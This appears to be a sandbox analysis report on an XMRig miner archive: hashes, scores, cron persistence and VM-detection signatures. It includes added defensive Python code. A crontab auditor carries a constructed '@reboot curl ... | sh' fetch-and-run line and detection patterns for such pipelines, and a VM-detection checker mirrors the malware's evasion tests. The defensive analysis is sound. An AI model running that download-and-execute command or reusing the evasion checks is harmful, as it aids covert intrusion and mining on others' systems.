Overview

Tasks (score out of 10, as reported per analysis task)

  Overview                                  10
  Static                                    10
  xm.gz         windows7-x64                 3
  xm.gz         windows10-2004-x64           7
  sample.tar    windows7-x64                 3
  sample.tar    windows10-2004-x64           7
  aarch64       ubuntu-18.04-amd64           6
  create        ubuntu-18.04-amd64           7
  create        debian-9-armhf               7
  create        debian-9-mips                1
  create        debian-9-mipsel              1
  hide          ubuntu-18.04-amd64           1
  hide.c        windows7-x64                 3
  hide.c        windows10-2004-x64           3
  init          ubuntu-18.04-amd64           3
  mining        ubuntu-18.04-amd64           6
  mining        debian-9-armhf               6
  mining        debian-9-mips                6
  mining        debian-9-mipsel              6
  mkcfg         ubuntu-18.04-amd64           1
  mkcfg         debian-9-armhf               1
  mkcfg         debian-9-mips                1
  mkcfg         debian-9-mipsel              1
  start         ubuntu-18.04-amd64          10
  start         debian-9-armhf               1
  start         debian-9-mips                1
  start         debian-9-mipsel              1
  x86_64        ubuntu-18.04-amd64           6

The overall score of 10 comes from the start task on ubuntu-18.04-amd64, the only task in which an XMRig miner payload was identified; the same script scored 1 on the armhf, mips and mipsel hosts.
General

  Target   xm.jpg
  Size     3.9MB
  Sample   231220-fzvkeageb9
  MD5      1371a2ca243dc0cd5fae198d69f44708
  SHA1     f7921b63d2b3f7587f192a5708e339e6a9b1f2f6
  SHA256   13607684da4fc4c2493996ff4ffe2347a806cb13b905d97bec815d5bf33824da
  SHA512   84aa7f461c8ebcdd5434f6be119217b9a51ea08c46b0b1ae1e9f0f4081dd77364c552beab8511719b8727972c46c25ab8769faccd65f8b21d6d591ee7a7d4b13
  SSDEEP   98304:EtPSdi6EM62kXoADzDtDSyKSgXBesozngrcLFoZYWjiDRUPGD:EtFMXQoAf5DNgXksoPFoC+idvD

The submission was named xm.jpg, but the analysis tasks handle the same file as xm.gz: the image extension does not reflect the file type.
Behavioral tasks

  behavioral1    xm.gz        win7-20231215-en
  behavioral2    xm.gz        win10v2004-20231215-en
  behavioral3    sample.tar   win7-20231215-en
  behavioral4    sample.tar   win10v2004-20231215-en
  behavioral5    aarch64      ubuntu1804-amd64-20231215-en
  behavioral6    create       ubuntu1804-amd64-20231215-en
  behavioral7    create       debian9-armhf-20231215-en
  behavioral8    create       debian9-mipsbe-20231215-en
  behavioral9    create       debian9-mipsel-20231215-en
  behavioral10   hide         ubuntu1804-amd64-20231215-en
  behavioral11   hide.c       win7-20231129-en
  behavioral12   hide.c       win10v2004-20231215-en
  behavioral13   init         ubuntu1804-amd64-20231215-en
  behavioral14   mining       ubuntu1804-amd64-20231215-en
  behavioral15   mining       debian9-armhf-20231215-en
  behavioral16   mining       debian9-mipsbe-20231215-en
  behavioral17   mining       debian9-mipsel-20231215-en
  behavioral18   mkcfg        ubuntu1804-amd64-20231215-en
  behavioral19   mkcfg        debian9-armhf-20231215-en
  behavioral20   mkcfg        debian9-mipsbe-20231215-en
  behavioral21   mkcfg        debian9-mipsel-20231215-en
  behavioral22   start        ubuntu1804-amd64-20231215-en
  behavioral23   start        debian9-armhf-20231215-en
  behavioral24   start        debian9-mipsbe-20231215-en
  behavioral25   start        debian9-mipsel-20231215-en
  behavioral26   x86_64       ubuntu1804-amd64-20231215-en

Note that the file named aarch64 (behavioral5) was detonated on an amd64 host, the same environment as x86_64 (behavioral26); the two files carry identical hashes (see Targets), so this is the same binary run twice.
Malware Config

Targets

Target: xm.jpg
  Size     3.9MB
  MD5      1371a2ca243dc0cd5fae198d69f44708
  SHA1     f7921b63d2b3f7587f192a5708e339e6a9b1f2f6
  SHA256   13607684da4fc4c2493996ff4ffe2347a806cb13b905d97bec815d5bf33824da
  SHA512   84aa7f461c8ebcdd5434f6be119217b9a51ea08c46b0b1ae1e9f0f4081dd77364c552beab8511719b8727972c46c25ab8769faccd65f8b21d6d591ee7a7d4b13
  SSDEEP   98304:EtPSdi6EM62kXoADzDtDSyKSgXBesozngrcLFoZYWjiDRUPGD:EtFMXQoAf5DNgXksoPFoC+idvD
  Score    7/10

  Checks computer location settings
    Looks up the country code configured in the registry, likely a geofence.

This signature was reported by the Windows tasks only. The archive's contents (the targets below) were analysed as Linux components, so check the process tree for which process performed the registry lookup before treating it as evidence that the sample geofences.
Target: sample
  Size     9.2MB
  MD5      1c0e4eed997020aa05e6b2c107a169ae
  SHA1     aaaec2f2e3dcbb7cd00bcc197d6e432dde4ae88e
  SHA256   9aec808e1209de34afa1659dcfcd5cd218076f53dee7959388a377ab0625ef06
  SHA512   ac18e8976fb583292386841c3cc313e11436fba810ca16b69524949f37a1e3df05093ffb9592ad07638b39e9f94941b5f9cca49828d7d09ca3ec7e194e860774
  SSDEEP   196608:mYK2IZ79KzcDPdUGZuhXDYK2IZ79KzcDPdUGZuhX:mYX6kStyzYX6kSty
  Score    7/10

  Checks computer location settings
    Looks up the country code configured in the registry, likely a geofence.

This is the 9.2MB tar that xm.gz decompresses to. Its ssdeep hash is two copies of one chunk, consistent with the archive holding the byte-identical aarch64 and x86_64 binaries listed below; the geofence note above applies here as well.
Target: aarch64
  Size     4.6MB
  MD5      1ba3f6f197a8ddd84cf30e29eed01ae9
  SHA1     e63b06246de680ac8357fb2d2fb467c630b85dd2
  SHA256   bbcdffd6fa3b1370dfc091bfd3bfca38be013f72f94af7ef29466d911c9604d8
  SHA512   818f671bbe14e3b863511fc13fd83bf30fdf6c89240431d96b4d85105d99552c16f3e90ff52f90ce2e1cb3a14df37be6f99203eeb24ff0327245987d3ebeb3a3
  SSDEEP   98304:0ALYK2IB3zOA9/iPkI0p8C7vJxdUGZ2KS55rZhhWI4:HYK2IZ79KzcDPdUGZuhX
  Score    6/10

  Checks CPU configuration
    Checks CPU information that indicates whether the system is a virtual machine.
  Checks hardware identifiers (DMI)
    Checks DMI information that indicates whether the system is a virtual machine.
  Reads CPU attributes
  Reads hardware information
    Accesses system information such as serial numbers and manufacturer names.
Target: create
  Size     669B
  MD5      18d2b80638dc8ed90e86c7caf316fe43
  SHA1     887f50f37a7e57abd113153becd5d8e36a780b19
  SHA256   d6a88499031026e3216ac733dd5b6365d597fa91599d33ec10a65cbb72e229b8
  SHA512   1ab557c50377097f1b4f59bacea66de1b569ea8e341d47155919d2996157f71e078e3a4b474ef005c7320e4eb46199fdda01dcffe5df6973778059466c0f2cec
  Score    7/10

  Executes dropped EXE
  Creates/modifies Cron job
    Cron runs tasks on a schedule and is commonly used for malware persistence.
  Enumerates running processes
    Discovers information about the processes currently running on the system.
  Reads CPU attributes
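The cron signature above is the one a responder can act on directly: whatever the 669-byte create script installs has to land in a crontab somewhere on the host. The auditor below is an added example for this report, not code from the sandbox or from the sample. It parses crontab entries and flags the traits a dropped persistence job typically shows; the crontab text is constructed, and the indicator lists (staging directories, hidden paths, download-and-execute pipelines, miner names) are the author's assumptions to tune per estate.

```python
"""Flag crontab entries with the traits of a dropped persistence script.

Added example for this report; it is not code from the sandbox or from the
sample it analysed. The crontab text below is constructed, and the
indicators (world-writable staging directories, hidden paths,
download-and-execute pipelines, miner names) are the author's assumptions
about what is worth surfacing when triaging a host.
"""
import re
from dataclasses import dataclass, field

# Directories any local user can write to; a common staging area for droppers.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# A path component that starts with a dot, e.g. /tmp/.X11-unix/.x/start.
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")
# curl/wget output piped straight into a shell.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
# Strings associated with coin-miner deployments (assumption; extend locally).
MINER_WORDS = re.compile(r"xmrig|minerd|stratum\+tcp", re.IGNORECASE)


@dataclass
class Finding:
    line: str
    reasons: list = field(default_factory=list)


def parse_crontab_line(line: str):
    """Return (schedule, command) for an entry, or None for comments,
    blank lines and VAR=value assignments."""
    s = line.strip()
    if not s or s.startswith("#") or "=" in s.split()[0]:
        return None
    if s.startswith("@"):                      # @reboot, @hourly, ...
        sched, _, cmd = s.partition(" ")
        return sched, cmd.strip()
    parts = s.split(None, 5)                   # five time fields + command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def audit_crontab(text: str) -> list:
    """Return one Finding per suspicious entry, with the reasons it matched."""
    findings = []
    for raw in text.splitlines():
        parsed = parse_crontab_line(raw)
        if parsed is None:
            continue
        sched, cmd = parsed
        reasons = []
        if any(d in cmd for d in STAGING_DIRS):
            reasons.append("command lives in a world-writable staging directory")
        if HIDDEN_PATH.search(cmd):
            reasons.append("command references a dot-prefixed (hidden) path")
        if DOWNLOAD_EXEC.search(cmd):
            reasons.append("pipes a download straight into a shell")
        if MINER_WORDS.search(cmd):
            reasons.append("mentions a known miner name")
        # The schedule only matters once something else already looks wrong;
        # plenty of legitimate jobs run @reboot or every minute.
        if reasons and sched in ("@reboot", "* * * * *"):
            reasons.append(f"aggressive schedule '{sched}' keeps it alive")
        if reasons:
            findings.append(Finding(raw, reasons))
    return findings


# Constructed sample crontab; the host name and paths are made up.
SAMPLE_CRONTAB = """\
# crontab -l (constructed for this example)
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/apt-get update -q
* * * * * /tmp/.X11-unix/.x/start >/dev/null 2>&1
@reboot (curl -fsSL http://example.invalid/init | sh) >/dev/null 2>&1
*/5 * * * * /home/user/backup.sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f.line)
        for r in f.reasons:
            print("   -", r)
```

Run it against `crontab -l -u <user>` output for every account and against the files under /etc/cron.d (those carry an extra user field after the schedule, so extend the parser before pointing it there). On the constructed input it reports two entries: the every-minute job under /tmp and the @reboot download pipeline.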
Target: hide
  Size     17KB
  MD5      0bb4618c041fdb18c2e115b65bc5401f
  SHA1     d9d039df279c4cdcceba347630a5fbdd296fca22
  SHA256   3f1e584ca9393a3f635d8a8573e5b7f863df0dc092911de03bffc2d4ab4f8b53
  SHA512   7dfc744f8aa5d571db704a56d6f5d5bda4b1889b1829a1cdbcc0272d059dc9fa1d2055e56c47ffb39851f175bbde41a6b137a1175cb7ad06eb64c601302538cf
  SSDEEP   192:RlEw1ktJKd7q6GIc1Ut4o3W4Ijl1LwxOXE/NabtULSi:fk+7TScIDD
  Score    1/10

  No signatures triggered.
Target: hide.c
  Size     8KB
  MD5      0ea36d63bdc19596106ffab97991e916
  SHA1     3f0884d86a24ae678ea6e4f13a3f1dc1aced8a0d
  SHA256   b1f5032c0abab0e185b90a5cacaecd6af2d10974ea2a8f9676732413bcff1424
  SHA512   2decede4480cdd408bb37d7a82f229ce4c51923690f91ddbb7dc2e5faf17aad50d083a439ec05e021e0309bf845354146dc3aa50c7845c55fedaedab0fa78912
  SSDEEP   96:ViUsLKDZd6ubi/9L4PLMtNuJ7tS8/Xjfo5:ViULD9i/duQY/XM5
  Score    3/10

  No signatures triggered. This is a C source file and was only submitted to the Windows tasks, so the score reflects host activity around opening the file rather than anything it does itself.
Target: init
  Size     41KB
  MD5      3d7964550b662754985bae37e0ee427b
  SHA1     3de28ccabe03f53cc4f534c96337ece4878d7a0e
  SHA256   03fab42e0825e6c35b803a125d63191dcf819f48bc9152180379b6c598632075
  SHA512   75849f318fa46c8415fac9bded6b0bcecc2762cbb3b2c63d0d27794bfaaf8803fff3b67919758a2b7d534f30ea0a4010e828615a09d64f562820e111b00ea7c3
  SSDEEP   768:SKRCujM9DdD7jBnNNfVQxsRq0e0t7KzPhfs4dckgPQMSaMyOB7jVCRPlNpiKVvI:SKRnKhjBNxVQxsRq0e0t7KzPhfs4dckc
  Score    3/10

  No signatures triggered.
Target: mining
  Size     355B
  MD5      8674ce902ffedf49ae4be47baabcc2c0
  SHA1     441ecd5d3a928125e10a0b6b19f7eed31cfd4476
  SHA256   8f93a7dd12dbd84749cb5cf675cd8371bd732655a8d048f269d8e88e8136e2e3
  SHA512   8428b05454cc9a6ccc3ddea862d9f38b6f10f542ebf6f784b2f7027a985f1adc9bf7c69d3306b6d4d1896af9ec8e7fe1e1d9291c60652c46d7e5126a2d2e3380
  Score    6/10

  Enumerates running processes
    Discovers information about the processes currently running on the system.
  Reads CPU attributes
Target: mkcfg
  Size     2KB
  MD5      b586844bb52809b9dd6c5982347e27e0
  SHA1     1aa9693db7bd01099d3022c5d697b601a938e205
  SHA256   a86693407c7ec7a73e1f0e39ae7727f8bdbbc690cbaedeb3817f04cb9f87a57c
  SHA512   2a3c4031b987178e8b93ced37794d2b2803ffb595b431f05b25793fd4874d8059d9499b8c00ca5abeb7524bba3c4d23a3a5cf2091a811c79224803f7a5f440f0
  Score    1/10

  No signatures triggered.
Target: start
  Size     176B
  MD5      fe2ac6ae76a359f127213790c460496f
  SHA1     df036a0088e1f418cb6e618fae06cf6282e79452
  SHA256   0f1e5ab87d39835c6c28f242e68f7855a57813ef8e3e07091eee4f4d4f7ef78d
  SHA512   8e41371af2cca37fff463fa1fff44db1cb462c8bf65f93f0ba0779adcfb4c812e411baf00bd67a2e7c92ddb27d65894bb18e205d6ca0e588c81219ba1b272889
  Score    10/10 (ubuntu-18.04-amd64 task)

  XMRig Miner payload

The miner identification came from the start task on ubuntu-18.04-amd64; the same 176-byte script scored 1 on armhf, mips and mipsel, where the payload it launches evidently did not run.
Target: x86_64
  Size     4.6MB
  MD5      1ba3f6f197a8ddd84cf30e29eed01ae9
  SHA1     e63b06246de680ac8357fb2d2fb467c630b85dd2
  SHA256   bbcdffd6fa3b1370dfc091bfd3bfca38be013f72f94af7ef29466d911c9604d8
  SHA512   818f671bbe14e3b863511fc13fd83bf30fdf6c89240431d96b4d85105d99552c16f3e90ff52f90ce2e1cb3a14df37be6f99203eeb24ff0327245987d3ebeb3a3
  SSDEEP   98304:0ALYK2IB3zOA9/iPkI0p8C7vJxdUGZ2KS55rZhhWI4:HYK2IZ79KzcDPdUGZuhX
  Score    6/10

  Checks CPU configuration
    Checks CPU information that indicates whether the system is a virtual machine.
  Checks hardware identifiers (DMI)
    Checks DMI information that indicates whether the system is a virtual machine.
  Reads CPU attributes
  Reads hardware information
    Accesses system information such as serial numbers and manufacturer names.

Size and all four hashes are identical to the aarch64 target above: the two entries are the same file under two names, which is why both produced the same signatures on the amd64 host.
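The CPU and DMI signatures on the aarch64 and x86_64 targets describe a binary reading /proc/cpuinfo and /sys/class/dmi/id/*. The check below is an added example for this report, not code from the sandbox or from the sample: it applies the two indicators those signatures refer to (the CPUID hypervisor flag and hypervisor names in the DMI vendor and product strings) to constructed inputs, and can also be pointed at the live host. The cpuinfo dumps and DMI values are constructed, and the hypervisor marker list is the author's assumption.

```python
"""Evaluate the CPU and DMI indicators behind the report's 'Checks CPU
configuration' and 'Checks hardware identifiers (DMI)' signatures.

Added example for this report; it is not code from the sandbox or from the
sample. The /proc/cpuinfo dumps and DMI values below are constructed, and
the hypervisor marker list is the author's assumption (extend it for your
own environment).
"""
import re

# Substrings of /sys/class/dmi/id/* values that name common hypervisors.
HYPERVISOR_MARKERS = ("qemu", "kvm", "vmware", "virtualbox", "innotek", "xen",
                      "parallels", "bochs", "virtual machine")
DMI_FILES = ("sys_vendor", "product_name", "board_vendor", "bios_vendor")


def cpuinfo_indicators(cpuinfo_text: str) -> list:
    """VM hints from a /proc/cpuinfo dump: the CPUID 'hypervisor' flag and
    a model name that names the hypervisor."""
    flags, model = set(), ""
    for line in cpuinfo_text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "flags":
            flags.update(value.split())
        elif key == "model name" and not model:
            model = value
    hints = []
    if "hypervisor" in flags:
        hints.append("cpuinfo: 'hypervisor' flag set (CPUID.1:ECX bit 31)")
    if re.search(r"qemu|virtual|kvm", model, re.IGNORECASE):
        hints.append(f"cpuinfo: model name reveals a hypervisor ({model})")
    return hints


def dmi_indicators(dmi: dict) -> list:
    """VM hints from a mapping of /sys/class/dmi/id file name to contents."""
    hints = []
    for name in DMI_FILES:
        value = dmi.get(name, "").strip()
        if any(marker in value.lower() for marker in HYPERVISOR_MARKERS):
            hints.append(f"dmi/{name}: {value}")
    return hints


def looks_like_vm(cpuinfo_text: str, dmi: dict) -> tuple:
    """Combine both sources; returns (verdict, list of matching indicators)."""
    hints = cpuinfo_indicators(cpuinfo_text) + dmi_indicators(dmi)
    return bool(hints), hints


def read_live_host() -> tuple:
    """Apply the same checks to the machine this runs on (Linux only)."""
    with open("/proc/cpuinfo") as fh:
        cpuinfo = fh.read()
    dmi = {}
    for name in DMI_FILES:
        try:
            with open(f"/sys/class/dmi/id/{name}") as fh:
                dmi[name] = fh.read()
        except OSError:   # file absent on some platforms or unreadable unprivileged
            pass
    return looks_like_vm(cpuinfo, dmi)


# Constructed inputs; not captured from the sandbox.
CPUINFO_VM = """\
processor\t: 0
model name\t: QEMU Virtual CPU version 2.5+
flags\t\t: fpu vme de pse tsc msr pae mce cx8 apic sep hypervisor sse4_2
"""
CPUINFO_METAL = """\
processor\t: 0
model name\t: Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz
flags\t\t: fpu vme de pse tsc msr pae mce cx8 apic sep sse4_2 avx2
"""
DMI_VM = {"sys_vendor": "QEMU", "product_name": "Standard PC (Q35 + ICH9, 2009)",
          "bios_vendor": "SeaBIOS"}
DMI_METAL = {"sys_vendor": "LENOVO", "product_name": "20KHCTO1WW",
             "bios_vendor": "LENOVO"}

if __name__ == "__main__":
    for label, cpu, dmi in (("vm", CPUINFO_VM, DMI_VM),
                            ("metal", CPUINFO_METAL, DMI_METAL)):
        verdict, why = looks_like_vm(cpu, dmi)
        print(label, "->", "VM" if verdict else "bare metal", why)
```

Two caveats when reading these signatures. "Reads CPU attributes" fires for any program that opens /proc/cpuinfo, and a miner does so legitimately to size its thread pool, so on its own it says little about evasion; the DMI reads are the more telling of the two. And a sandbox that hides these strings (custom DMI tables, the hypervisor bit masked) defeats exactly this class of check, which is why the report's verdict rests on the behaviour observed, not on whether the binary looked.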